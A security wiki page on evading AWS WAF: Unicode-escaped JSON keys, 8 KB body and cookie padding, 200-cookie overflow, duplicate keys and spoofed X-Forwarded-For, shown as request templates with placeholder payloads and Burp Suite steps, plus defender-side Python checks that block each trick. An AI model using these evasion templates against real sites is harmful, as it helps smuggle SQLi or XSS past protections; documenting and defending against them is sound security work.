Amazon Web Services WAF

For general bypass techniques, see WAF Bypass.

Fingerprint

The server response looks like:

HTTP/2 403 Forbidden
Server: awselb/2.0
[...]

Bypass with encoding

AWS WAF, in its current implementation, does not decode escape sequences inside JSON keys when matching a given JSON Pointer of a rule. This behavior can be exploited to bypass rules that specifically target the value of a parameter, such as the “id” parameter. By replacing any character of the key with a Unicode escape sequence, an attacker can effectively evade the rule and potentially pass malicious content undetected.

POST /some-vulnerable-api HTTP/2
Host: ...

{"\u0070aram1":"some payload"}

Bypass with content size

For JSON body inspection, only the first 8 KB (8,192 bytes) of the request body are forwarded to AWS WAF for inspection. Add 8 KB of spaces before the payload in the body.

This works for attacks such as SQL injection (SQLi) and Cross Site Scripting (XSS).

For Application Load Balancer and AWS AppSync, AWS WAF can inspect the first 8 KB of the body of a request. For CloudFront, API Gateway, Amazon Cognito, App Runner, and Verified Access, by default, AWS WAF can inspect the first 16 KB, and you can increase the limit up to 64 KB in your web ACL configuration.

Most sites have JSON protection, so this would not work on its own.

POST /some-vulnerable-api HTTP/2
Host: ...

{<Insert 8192 space characters here>"param1":"SQLi payload"}

Generate a string of 1024 characters and store it in a HackVertor global variable named “waf_bypass” in Burp Suite:

msf-pattern_create -l 1024

If there is some JSON protection, add another JSON attribute and put the padding characters in there (eight 1024-character chunks make up the 8 KB):

POST /some-vulnerable-api HTTP/2
Host: ...

{"whatever":"<@get_waf_bypass/><@get_waf_bypass/><@get_waf_bypass/><@get_waf_bypass/><@get_waf_bypass/><@get_waf_bypass/><@get_waf_bypass/><@get_waf_bypass/>","param1":"SQLi payload"}

Bypass for cookies

The oversize handling setting defines what AWS WAF should do if the cookies of a request are more numerous or larger than AWS WAF can inspect. AWS WAF does not support inspecting the entire contents of request cookies when they exceed 8 KB (8,192 bytes) or 200 total cookies. The underlying host service forwards a maximum of 200 cookies and at most 8 KB of cookie contents to AWS WAF.

Some cookie names, such as “debug”, are blocked. Use Param Miner to find them: right-click on a request -> Extensions -> Param Miner -> Guess params -> Guess cookie parameters.

Large cookie

Same as bypass with content size, but applied to cookies.

POST /some-vulnerable-api HTTP/2
Host: ...
Cookie: cookie1=<@get_waf_bypass/><@get_waf_bypass/><@get_waf_bypass/><@get_waf_bypass/><@get_waf_bypass/><@get_waf_bypass/><@get_waf_bypass/><@get_waf_bypass/>; <MY-BLOCKED-COOKIE-HERE>

[...]

Too many cookies

Generate 200 cookies in Python.

```python
# Build a Cookie header value holding 200 dummy cookies: cookie0=a;cookie1=a;...
payload = ""
for i in range(200):
    payload = payload + "cookie" + str(i) + "=a;"
print(payload)
```

Insert the 200+ cookies in the request, and add the blocked cookie after.

POST /some-vulnerable-api HTTP/2
Host: ...
Cookie: cookie1=a;cookie2=a; ...; cookie200=a; <MY-BLOCKED-COOKIE-HERE>

[...]
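The two cookie bypasses above both rely on the inspector only seeing the first 8 KB and the first 200 cookies. The following added example (not code from the original page) shows, from the defender's side, which cookie names a truncating inspector actually sees for the constructed headers, and a check that treats an over-limit Cookie header as a block rather than letting the uninspected tail through. The limits are the ones stated on this page; the samples and the blocked name “debug” are constructed.

```python
COOKIE_BYTE_LIMIT = 8192   # from the page: at most 8 KB of cookie contents reach AWS WAF
COOKIE_COUNT_LIMIT = 200   # from the page: at most 200 cookies are forwarded


def parse_cookies(header: str) -> list:
    """Split a Cookie header value into (name, value) pairs, preserving order."""
    pairs = []
    for part in header.split(";"):
        part = part.strip()
        if not part:
            continue
        name, _, value = part.partition("=")
        pairs.append((name.strip(), value.strip()))
    return pairs


def visible_to_truncated_inspector(header: str) -> list:
    """Cookie names an inspector sees when it only receives the first
    COOKIE_BYTE_LIMIT bytes and COOKIE_COUNT_LIMIT cookies (the behaviour
    the page describes). Assumption: the header is ASCII, one byte per char."""
    truncated = header[:COOKIE_BYTE_LIMIT]
    return [name for name, _ in parse_cookies(truncated)][:COOKIE_COUNT_LIMIT]


def inspect_cookies(header: str, blocked_names: set) -> dict:
    """Defender-side check with oversize handling set to block: anything that
    cannot be inspected in full is refused instead of forwarded."""
    pairs = parse_cookies(header)
    if len(header.encode("utf-8")) > COOKIE_BYTE_LIMIT:
        return {"verdict": "block", "reason": "cookie header exceeds inspectable size"}
    if len(pairs) > COOKIE_COUNT_LIMIT:
        return {"verdict": "block", "reason": "more cookies than can be inspected"}
    hit = [name for name, _ in pairs if name in blocked_names]
    if hit:
        return {"verdict": "block", "reason": f"blocked cookie {hit[0]!r}"}
    return {"verdict": "allow", "reason": ""}


# Constructed samples mirroring the two requests on this page.
LARGE_COOKIE = "cookie1=" + "A" * 8192 + "; debug=1"
MANY_COOKIES = "".join(f"cookie{i}=a;" for i in range(200)) + " debug=1"
NORMAL = "session=abc; theme=dark"

if __name__ == "__main__":
    for label, header in (("large", LARGE_COOKIE), ("many", MANY_COOKIES), ("normal", NORMAL)):
        seen = visible_to_truncated_inspector(header)
        print(label, "debug visible to truncated inspector:", "debug" in seen,
              "| full check:", inspect_cookies(header, {"debug"}))
```

For both constructed bypass headers the truncated view never contains “debug”, which is exactly why the oversize handling for cookies has to be set to block rather than continue.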

Bypass with duplicate parameter

This depends on the option configured for invalid JSON handling in the body inspection settings. The default option is “None”, which means AWS WAF takes no action and proceeds with the request.

POST /some-vulnerable-api HTTP/2
Host: ...

{"param1":"whatever", "param1":"some payload"}
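The three JSON body bypasses on this page (escaped key, oversized or padded body, duplicate key) all exploit a gap between what the inspector matches on and what the application eventually parses. The following added example, which is not code from the original page, is an application-side body check that closes all three gaps: it refuses bodies beyond the inspectable limit, rejects duplicate keys while parsing, and applies the value rule to the decoded key names, so “\u0070aram1” is matched as “param1”. The 8,192-byte limit is the page's figure; `inspect_json_body`, `demo_rule`, the escaped-key heuristic and the sample bodies are assumptions constructed for the example.

```python
import json
import re
from typing import Callable

# Limit the page gives for ALB / AppSync body inspection.
BODY_INSPECT_LIMIT = 8192

# Heuristic (assumption): a quoted string containing a \uXXXX escape and
# followed by a colon is an object key written with an escape sequence.
ESCAPED_KEY = re.compile(r'"(?:[^"\\]|\\.)*\\u[0-9a-fA-F]{4}(?:[^"\\]|\\.)*"\s*:')


def _no_duplicate_keys(pairs):
    """object_pairs_hook that rejects an object repeating a key."""
    obj = {}
    for key, value in pairs:
        if key in obj:
            raise ValueError(f"duplicate key {key!r}")
        obj[key] = value
    return obj


def inspect_json_body(raw: bytes, value_rule: Callable[[str, str], bool],
                      limit: int = BODY_INSPECT_LIMIT) -> dict:
    """Inspect a JSON request body before the application uses it.

    Returns {"verdict": "allow"|"block", "reasons": [...], "params": {...}}.
    value_rule(key, value) returns True when a parameter value must be blocked;
    it runs on the *decoded* keys that json.loads produces.
    """
    reasons = []
    if len(raw) > limit:
        # Oversize handling set to block: an over-limit body cannot be
        # inspected in full, so it is refused instead of forwarded.
        return {"verdict": "block",
                "reasons": [f"body exceeds {limit} inspectable bytes"], "params": {}}
    text = raw.decode("utf-8", errors="replace")
    if ESCAPED_KEY.search(text):
        reasons.append("unicode escape inside a JSON key")
    try:
        params = json.loads(text, object_pairs_hook=_no_duplicate_keys)
    except ValueError as exc:
        # Malformed JSON and duplicate keys both land here; unlike the WAF
        # default of "None", invalid JSON is treated as a block.
        return {"verdict": "block", "reasons": reasons + [f"invalid JSON: {exc}"], "params": {}}
    if not isinstance(params, dict):
        params = {}
    for key, value in params.items():
        if isinstance(value, str) and value_rule(key, value):
            reasons.append(f"rule matched on parameter {key!r}")
    return {"verdict": "block" if reasons else "allow", "reasons": reasons, "params": params}


def demo_rule(key: str, value: str) -> bool:
    """Toy stand-in for a real rule (constructed): block 'payload' in param1."""
    return key == "param1" and "payload" in value


# Constructed samples mirroring the request bodies on this page.
SAMPLE_ESCAPED_KEY = b'{"\\u0070aram1":"some payload"}'
SAMPLE_DUPLICATE = b'{"param1":"whatever", "param1":"some payload"}'
SAMPLE_PADDED = b" " * 8192 + b'{"param1":"some payload"}'
SAMPLE_PAD_ATTR = b'{"whatever":"' + b"A" * 8192 + b'","param1":"some payload"}'
SAMPLE_CLEAN = b'{"param1":"hello"}'

if __name__ == "__main__":
    for body in (SAMPLE_ESCAPED_KEY, SAMPLE_DUPLICATE, SAMPLE_PADDED, SAMPLE_PAD_ATTR, SAMPLE_CLEAN):
        print(inspect_json_body(body, demo_rule))
```

The escaped-key sample is blocked twice over: the heuristic flags the escape, and because `json.loads` has already decoded the key, the same rule that targets `param1` in the unescaped request also fires here.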

Bypass with HTTP headers

By default, AWS WAF uses the IP address from the web request origin. It can be configured to use headers (typically “X-Forwarded-For”) when using proxies or load balancers.

Append HTTP header “X-Forwarded-For”.

X-Forwarded-For: 10.0.0.1

The IP Rotate extension (GitHub) for Burp Suite can also be used. Configure AWS credentials with API Gateway permissions in the extension interface.
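The reason a client-supplied “X-Forwarded-For” works against header-based IP rules is that the header is trusted regardless of who added it. The following added example (not code from the original page) shows the defender-side pattern for deriving the client address: the header is only honoured when the TCP peer is one of the application's own proxies, and it is read from the right, skipping those proxies, so whatever a client prepends is ignored. The trusted proxy ranges and the sample addresses are constructed assumptions.

```python
import ipaddress
from typing import Optional

# Constructed: address ranges of the proxies / load balancers in front of the app.
TRUSTED_PROXIES = [
    ipaddress.ip_network("10.1.0.0/16"),
    ipaddress.ip_network("192.0.2.10/32"),
]


def _is_trusted(ip: str) -> bool:
    """True when ip parses and lies inside one of the trusted proxy ranges."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in TRUSTED_PROXIES)


def client_ip(peer_ip: str, x_forwarded_for: Optional[str]) -> str:
    """Return the address that IP-based rules and rate limits should key on.

    A direct connection, or a header arriving from an untrusted peer, yields the
    peer address itself. Otherwise the hop list is walked from the right; each
    trusted proxy is skipped and the first other address is the real client,
    because proxies append and clients can only prepend.
    """
    if not _is_trusted(peer_ip) or not x_forwarded_for:
        return peer_ip
    hops = [h.strip() for h in x_forwarded_for.split(",")]
    for hop in reversed(hops):
        if not hop or _is_trusted(hop):
            continue  # one of our own proxies, or an empty element
        try:
            return str(ipaddress.ip_address(hop))
        except ValueError:
            return peer_ip  # malformed hop: fall back to the connection address
    return peer_ip


if __name__ == "__main__":
    # Client connects directly and sends the spoofed header from this page.
    print(client_ip("203.0.113.5", "10.0.0.1"))
    # Same client behind our proxy, which appended the true address.
    print(client_ip("10.1.2.3", "10.0.0.1, 203.0.113.5"))
```

In both printed cases the result is 203.0.113.5: the spoofed 10.0.0.1 never becomes the address the rules see.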
